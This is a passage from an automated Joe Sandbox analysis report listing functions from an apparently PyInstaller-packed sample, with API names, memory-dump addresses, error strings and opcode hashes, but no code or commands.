                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                              • Instruction ID: df1133399f990eec0029a3c2bf0e5599327757a551e291416c3c5cf70455a6bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9031E821619AC145FA21EB20E4907EAA355EF84BE8F800272EE6D477CDDF3CD6458721
                                                                                                                                                                                                                              Function 00007FF8E8132940 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ComputerErrorLastName
                                                                                                                                                                                                                              • String ID: socket.gethostname
                                                                                                                                                                                                                              • API String ID: 3560734967-2650736202
                                                                                                                                                                                                                              • Opcode ID: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
                                                                                                                                                                                                                              • Instruction ID: f8f01552f5c23cc7677dd5f78d991a63ff230a5553faa859a5b2382d54a329c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3313E61B0CB4386EB249BA1A85437E73A5FF89BD5F460435D94E866A4DF3CE044CB0A
                                                                                                                                                                                                                              Function 00007FF8E8138360 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_ntop
                                                                                                                                                                                                                              • String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
                                                                                                                                                                                                                              • API String ID: 448242623-2822559286
                                                                                                                                                                                                                              • Opcode ID: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
                                                                                                                                                                                                                              • Instruction ID: 6a9e4dddeb31176e394991ec63e866a97ba02e3d46d6b2bd9d3d15af934bfa83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2311C61A2CA87D1EB608BA1E8507BD63A0FF89BC4F424432D54E93B64DF3CE449C716
                                                                                                                                                                                                                              Function 00007FF8E8135BA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getsockopt
                                                                                                                                                                                                                              • String ID: getsockopt buflen out of range$ii|i:getsockopt
                                                                                                                                                                                                                              • API String ID: 3272894102-2750947780
                                                                                                                                                                                                                              • Opcode ID: 8c8cce7771d3f24cc9ac2e410138943029079e80a9b5900f9f3c000819b3f68c
                                                                                                                                                                                                                              • Instruction ID: 7476eb513a92ca7a2495a3ed2da1838d0f2cfa6a249e7aa635969aedf001d1b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c8cce7771d3f24cc9ac2e410138943029079e80a9b5900f9f3c000819b3f68c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD315B72A19A46C7EB14CFA4E4403AE73A4FB84B88F110035EA8E83768DF3CD445CB45
                                                                                                                                                                                                                              Function 00007FF7EAD02810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction ID: 372e37d06d474096e91f2fde833aed86e05630f1b0b141587d3e2c14a81d2b76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF21AE72B08B4182F710EB64F8847EAA3A5FB88784F800136EA8D57659DE3CE245C750
                                                                                                                                                                                                                              Function 00007FF8E8137AA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: gethostbyname
                                                                                                                                                                                                                              • String ID: et:gethostbyname_ex$idna$socket.gethostbyname
                                                                                                                                                                                                                              • API String ID: 930432418-574663143
                                                                                                                                                                                                                              • Opcode ID: 763fd7e5a6e8485f873114a20fb6e7adcccc8433eb82f096b660c8048ead8007
                                                                                                                                                                                                                              • Instruction ID: 744114ef13251dc0da0842aada5c19209c10b9881f65bc6d3eb6a6557ad999e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 763fd7e5a6e8485f873114a20fb6e7adcccc8433eb82f096b660c8048ead8007
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42215161618B8291EA10CBA2F8447AEA364FB89FC4F464132DE8D53758DF3CE545C745
                                                                                                                                                                                                                              Function 00007FF8E81384B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_pton
                                                                                                                                                                                                                              • String ID: illegal IP address string passed to inet_pton$is:inet_pton$unknown address family
                                                                                                                                                                                                                              • API String ID: 1350483568-903159468
                                                                                                                                                                                                                              • Opcode ID: 26846f0312d1f675127fc7a928663de3b4f9f1fae969a89936cdafc1ca1b6d0b
                                                                                                                                                                                                                              • Instruction ID: 1945041a4449f11712033213f573055e4336c635616f2263c43894ec1b8ffe43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26846f0312d1f675127fc7a928663de3b4f9f1fae969a89936cdafc1ca1b6d0b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F212C61A1C942D7EA60DBA4E8503BD2361FF85BC4F921432E54F936A4DF3CE949C70A
                                                                                                                                                                                                                              Function 00007FF7EAD1C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction ID: 5d8201fa0a053522d8e2745fc031291a5de4dcc2ccc761ece97f39acabe0c75f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46D10272B08A918AF710DF75D4403ACBBB1FB64798B804276DE5E97B89DE38D106C321
                                                                                                                                                                                                                              Function 00007FF7EAD1CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D07C
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D107
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction ID: 2578ef9be3e40082490e357f5b45c89aec39f4200902e0fe636529eaad24ee1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F91C472E1865189F760EF7594403BDABA0FF54B88F9441B6DE8E52688CF3CD482C722
                                                                                                                                                                                                                              Function 00007FF7EAD1F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction ID: b646dc32fdc2b01716099ffc340b7a1ed4211f84c7692e1b8b8c957dbdd4d13a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F510772F0421186FB14EF749A957BCA7A1EB68368F900277DD1E52AEDDB3CA402C611
                                                                                                                                                                                                                              Function 00007FF7EAD1577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction ID: cec8a74ef634075d583b2d591895f3102ba968675d24564c1a9b005a7a1d460a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF517A62E086418AFB10EFB1D4503BDA7B5EB68B58F908576DE0D5B688DF3CD4408762
                                                                                                                                                                                                                              Function 00007FF7EAD020C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: 116b9c171df06c3b699768c802153cc3758b5bc8230ba9d9a71ca4fcbbf4221e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B811C631A0C54242F754E76AE5C437A9392EB98788FC44072DB4907B8DCD7DE9C58222
                                                                                                                                                                                                                              Function 00007FF8E8132EDC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 8abdb046c2d483d6713d37fa3c95cfe7202fcb201bb2e424a1ff1cb05108d538
                                                                                                                                                                                                                              • Instruction ID: 05cb45cef1c45c317905b990150ba65e84717481f746c0136568e8f6017485d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8abdb046c2d483d6713d37fa3c95cfe7202fcb201bb2e424a1ff1cb05108d538
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F111822B14B018AEB008FA0E8543AC33A4FB59798F440A31DA6D867A8DF7CD154C345
                                                                                                                                                                                                                              Function 00007FF7EAD0D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction ID: d9cd9b7bc61391cace1ad6055a30a35423f7646f5771dd58d4478f56b082e81d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35111C32B14F058AFB00DB60E8543B973A8FB59758F840E32DA6D467A8DF78D1588351
                                                                                                                                                                                                                              Function 00007FF8E80F2F60 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
